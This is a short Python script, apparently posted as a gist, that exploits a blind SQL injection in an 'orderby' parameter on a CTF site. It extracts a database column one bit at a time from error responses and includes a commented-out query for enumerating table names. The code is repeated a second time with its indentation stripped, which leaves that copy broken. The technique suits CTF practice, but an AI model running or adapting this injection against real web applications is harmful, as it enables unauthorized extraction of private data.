/bitcoinctf_exploit2.py Secret

## bitcoinctf_exploit2.py
import requests
import string
import sys


url = "http://www.bitcoinctf.com/"
page = "b00km4rks.php?orderby=(%s)&limit=1"

# Table names
# query = "(select(table_name)from(information_schema.tables)where((ord(substring(table_name,1,1))>90)and(substring(table_name,%s,1)='%s'))union(select(1)))"

# Bookmarks
query = "(select(addedby)from(urls)where((deleted=2)and(ord(substring(addedby,%s,1))%s26%s=%s))union(select(1)))"


for i in range(1, 38):

    value = 0
    for c in range(8):
        exp = 2**c

        response = requests.get(url + page % (query % (i, '%', exp, exp)))
        if response.text[:7] == "Unknown":
            value += exp

    if value == 0:
        print "END"
        break
    print chr(value)
	import requests
	import string
	import sys


	url = "http://www.bitcoinctf.com/"
	page = "b00km4rks.php?orderby=(%s)&limit=1"

	# Table names
	# query = "(select(table_name)from(information_schema.tables)where((ord(substring(table_name,1,1))>90)and(substring(table_name,%s,1)='%s'))union(select(1)))"

	# Bookmarks
	query = "(select(addedby)from(urls)where((deleted=2)and(ord(substring(addedby,%s,1))%s26%s=%s))union(select(1)))"


	for i in range(1, 38):

	value = 0
	for c in range(8):
	exp = 2**c

	response = requests.get(url + page % (query % (i, '%', exp, exp)))
	if response.text[:7] == "Unknown":
	value += exp

	if value == 0:
	print "END"
	break
	print chr(value)